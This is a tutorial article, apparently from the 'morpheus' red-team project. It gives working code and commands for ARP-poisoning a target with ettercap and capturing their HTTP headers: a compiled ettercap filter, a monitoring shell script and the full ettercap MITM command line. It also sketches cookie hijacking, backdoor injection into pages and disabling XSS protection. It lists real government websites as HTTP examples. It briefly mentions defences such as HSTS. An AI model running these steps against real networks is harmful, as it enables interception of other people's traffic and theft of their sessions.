HTTP tcp Header Information Gathering Module

Article Glossario

[1] A little history about this module Develop/Objectives/Info
[2] Step by step how to use Morpheus tool to capture HTTP Headers
[3] Reverse enginnering Morpheus HTTP Headers capture module

---

Definition - What does HTTP Header mean?

HTTP Headers are the name or value pairs that are displayed in the request and response messages of message headers for Hypertext Transfer Protocol (HTTP). Usually, the Header name and the values are separated by a single colon. HTTP Headers are an integral part of HTTP requests and responses. In simpler terms, HTTP Headers are the code that transfers data between a Web server and a browser.

Why capture target HTTP tcp Headers?

Some Headers influence how the browser works, like instructing the browser to no-cache (Cache-Control) the webpage into local cache, displays client and server ip address(s), domain names, dns records, target browser language accepted (Accept-Language), proxy's ip addr(s), auth cookies, etc.. The User-Agente string also allow us to know the browser in use, is version, the operative system of target machine, etc.

In what scenario this kind of information its usefull?

This kind of information gathering pros-exploitation (before any exploitation technic be attempted) can be usefull in provinding information about target browser version installed that could lead to one entry point into target system. Let's suppose target browser in use is Firefox/52.0 version, with that kind of information in our side, the attacker knows that target browser its vulnerable to all exploits for Firefox since version 52.0 untill Firefox current version 63.0.3, or simple provide one way to know what operative system does the target use, before sending a wrong payload arch to target and the agent does not get executed, Recon its one importante step before the actual exploitation occours ..

How does morpheus tool actually captures target HTTP tcp Headers?

Morpheus tool will use ettercap (backend appl) ARP poison to redirect target tcp traffic through our attacker machine (MITM). Then one ettercap filter (writen by me) will regex search inside captured packets for the Headers strings, displays them in real time (as they are captured) into morpheus terminal windows and triggers one warning sound if any capture occours (if configurated). Then finally stores all captures into attackers ../morpheus/logs folder for later review.

further reading:

• Norton security - What is a man-in-the-middle (MITM) attack?

It is possible any kind of 'On The Fly' exploitation using morpheus?

Yes... But NOT using morpheus 'HTTP tcp Header information gathering' module (the one that have trigger the written of this article). In some scenaries its possible (with the help of one ettercap filter) to capture target tcp packet before it arrives to target machine and inject backdoor's into [body] html tags, or instruct on-the-fly target browser to not use XSS protection mechanisms by using replace() ettercap filter syntax to replace the XSS Header value from protecting one user to turn that setting off.. Another scenario will be capture target's auth cookies and autenticate attacker into the website beeing visited, using the cookie hijacking technic ..

Some examples:

• cranklin - Prank hacking your co-workers for fun (on the fly)
  
  

It is possible to stop this kind of attacks from occouring?

yes.. Using software that protects the ARP cache locally and prevents man-in-the-middle (MITM) attacks, or recent browser security mechanisms like HSTS or HTTPS_everywere (plug-in), etc. 'Can prevent this type of attacks from happening'.

Can this technics be reproduced under HTTPS?

yes.. with the help of external programs like: sslstrip+ (by Leonardo Nve) that has the ability to bypass HSTS browser secure mechanisms and capture/decode HTTPS traffic through a proxy (dns2proxy can be used for that purpose), Or MITMF framework. But morpheus by default did NOT have implemented this kind of technics, why? because morpheus tool did not have been written to be one 'attack' framework, morpheus objective its to put is users manipulating tcp/udp traffic on the fly with the help of ettercap filters (All options in main menu are examples how to script-on-the-fly)..

[0] Article Glossario

---

Step-By-Step how to use morpheus to capture HTTP Headers

This article logfile can be review were:

HTTP tcp Headers Information Gathering - video tutorial

video tutorial

[0] Article Glossario

---

Reverse enginnering morpheus module

• The filter ( /root/morpheus/filters/IG.eft )
  https://github.com/r00t-3xp10it/morpheus/blob/master/filters/IG.eft

  # if ip.source = target ip addr (from source ip)
  if (ip.src == '192.168.1.71') {
  
    # if ip.protocol = tcp AND tcp.destination = port 80 OR tcp.source = port 80
    if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) {
      msg("[morpheus] host:192.168.1.71   [ ⊶  ]  port:80   [tcp] http ☆");
  
        # regex search for the string: 'Host' inside tcp packet
        if (regex(DECODED.data, ".*Host.*")) {
          msg("\n[morpheus] host:192.168.1.71   header:found");
          msg("[morpheus] | status  : Target tcp header detected");
          msg("[morpheus] |_ header : Host string found ✔\n");
  
          # ettercap API to write data into logfile (local)
          log(DECODED.data, "./IG.log");
       }
    }
  }
  

• Compiling the filter to be used in ettercap

  etterfilter /root/IG.eft -o /root/IG.ef
  

• The auxiliary script ( /root/morpheus/bin/IG.sh )
  https://github.com/r00t-3xp10it/morpheus/blob/master/bin/IG.sh

  #!/bin/sh
  echo -n "Be alerted by a BEEP in every <header> capture? (y/n):";read op
  if [ $op = "y" ] || [ $op = "yes" ]; then
    OGG=`locate .ogg | grep "default/alerts" | head -3 | tail -1`
    warn=yes
  else
    warn=no
  fi
  
  # Start of the loop function ..
  # For evertime IG.log its written it will trigger warnings and displays.
  while :
  do
  
  # check for logfile presence to trigger displays ..
  if [ -e /root/IG.log ]; then
    hour=`date | awk {'print $4,$5,$6'}`
    echo "" && echo "Tcp header capture"
    echo "Hour/Time: $hour"
  
    # Play alert sound? (paplay) settings ..
    if [ $warn = "yes" ]; then
      paplay $OGG
    fi
  
    # Parsing captured data from IG.log file ..
    HST=`cat /root/IG.log | egrep -m 1 "Host:" | awk {'print $2'}` > /dev/nul 2>&1
    # Print OnScreen headers captured ..
    sleep 0.8
    echo "------------------------------------------------"
    echo "Host                : $HST"
    echo "------------------------------------------------"
  
    # delete temp logfile to trigger new alerts and displays
    rm -f /root/IG.log > /dev/nul 2>&1
    sleep 1.3
    fi
  
  # end loop
  done
  exit
  

• Config ettecap privs on etter.conf

  nano /etc/ettercap/etter.conf
  

• Ettercap (ARP-poison) + Filter (IG.eft) + Auxiliary (IG.sh)

  xterm -T "http tcp header info gathering" -geometry 109x27 -e "cd /root && ./IG.sh" & ettercap -T -Q -i wlan0 -F /root/IG.ef -M ARP /// ///
  

• How to use your browser search engine (google) to find HTTP websites?..

  ìnurl:http://
  

Some examples:

• http://apple.com.fi/pt/
• http://www.dgeg.gov.pt/
• http://www.cm-odivelas.pt/
• http://www.governo.gov.pt/
• http://www.cm-monchique.pt/
• http://www.portaldasfinancas.gov.pt/

[0] Article Glossario

---

Usefull Links:

• Report bugs: https://github.com/r00t-3xp10it/morpheus/issues
• Scripting tutorials: https://github.com/r00t-3xp10it/morpheus/issues?

Special Thanks: shanty damayanti (my geek wife)

SuspiciousShellActivity - RedTeam @2018